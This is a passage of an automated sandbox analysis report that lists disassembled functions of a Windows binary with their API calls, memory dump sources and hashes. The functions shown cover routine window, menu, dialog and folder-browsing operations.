                                                                                                                                                  • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                                                                                                                                  • Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                                                                                                                                  • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                                                                                                                                  Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • timeGetTime.WINMM ref: 00464F7A
                                                                                                                                                    • Part of subcall function 0042049F: timeGetTime.WINMM(?,75C0B400,00410E7B), ref: 004204A3
                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                                                                                                                  • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                                                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                                                                                                                  • SetActiveWindow.USER32 ref: 0046500B
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00465043
                                                                                                                                                  • IsWindow.USER32 ref: 0046504F
                                                                                                                                                  • EndDialog.USER32(00000000), ref: 00465060
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                  • String ID: BUTTON
                                                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                                                  • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                                                                                  • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                                                                                                                                  • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                                                                                  • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                                                                                                                                                  Function 0046D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0046D5EA
                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                                                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                                                                                                                                                  • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                                                                                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                                                                                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                                                                                                                                                  • _memset.LIBCMT ref: 0046D7E1
                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                                                                                                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1246142700-0
                                                                                                                                                  • Opcode ID: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                                                                                                                                                  • Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
                                                                                                                                                  • Opcode Fuzzy Hash: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                                                                                                                                                  • Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
                                                                                                                                                  Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                                                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                                                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                                  • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                                                                                                  • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                                                                                                                                                  • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                                                                                                  • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                                                                                                                                                  Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                                                                                                                  • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 641708696-0
                                                                                                                                                  • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                                                                                  • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                                                                                                                                  • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                                                                                  • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                                                                                                                                  Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 004021D3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ColorLongWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 259745315-0
                                                                                                                                                  • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                                                                                                  • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                                                                                                                                                  • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                                                                                                  • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                                                                                                                                  Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                                                                                                                                  • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                                                                                                                                  • _wcscpy.LIBCMT ref: 0046A9FF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                  • API String ID: 2820617543-1000479233
                                                                                                                                                  • Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                                                                                                  • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                                                                                                                                  • Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                                                                                                  • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                                                                                                                                  Function 00487152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 0048716A
                                                                                                                                                  • CreateMenu.USER32 ref: 00487185
                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00487194
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                                                                                                                                  • IsMenu.USER32(?), ref: 00487237
                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00487241
                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                                                                                                                                  • DrawMenuBar.USER32 ref: 00487276
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                  • String ID: 0$F
                                                                                                                                                  • API String ID: 176399719-3044882817
                                                                                                                                                  • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                                                                                                  • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                                                                                                                                                  • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                                                                                                  • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                                                                                                                                  Function 004874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                                                                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00487594
                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                                                                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                  • String ID: static
                                                                                                                                                  • API String ID: 2559357485-2160076837
                                                                                                                                                  • Opcode ID: deb04c372c4f7f58effd7c9f9f8f8c3622686de60ace0c164addb78cb82c2ccd
                                                                                                                                                  • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                                                                                                                                                  • Opcode Fuzzy Hash: deb04c372c4f7f58effd7c9f9f8f8c3622686de60ace0c164addb78cb82c2ccd
                                                                                                                                                  • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                                                                                                                                  Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00426E3E
                                                                                                                                                    • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00426ED7
                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00426F0D
                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00426F2A
                                                                                                                                                  • __allrem.LIBCMT ref: 00426F80
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                                                                                                                  • __allrem.LIBCMT ref: 00426FB3
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                                                                                                                  • __allrem.LIBCMT ref: 00426FE8
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                                                                                                                  • __invoke_watson.LIBCMT ref: 00427077
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 384356119-0
                                                                                                                                                  • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                                                  • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                                                                                                                                  • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                                                  • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                                                                                                                                  Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00462542
                                                                                                                                                  • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                                                                                                                                  • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 004625EB
                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 0046262F
                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 004626BA
                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4176008265-0
                                                                                                                                                  • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                                                                                  • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                                                                                                                                  • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                                                                                  • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                                                                                                                                  Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
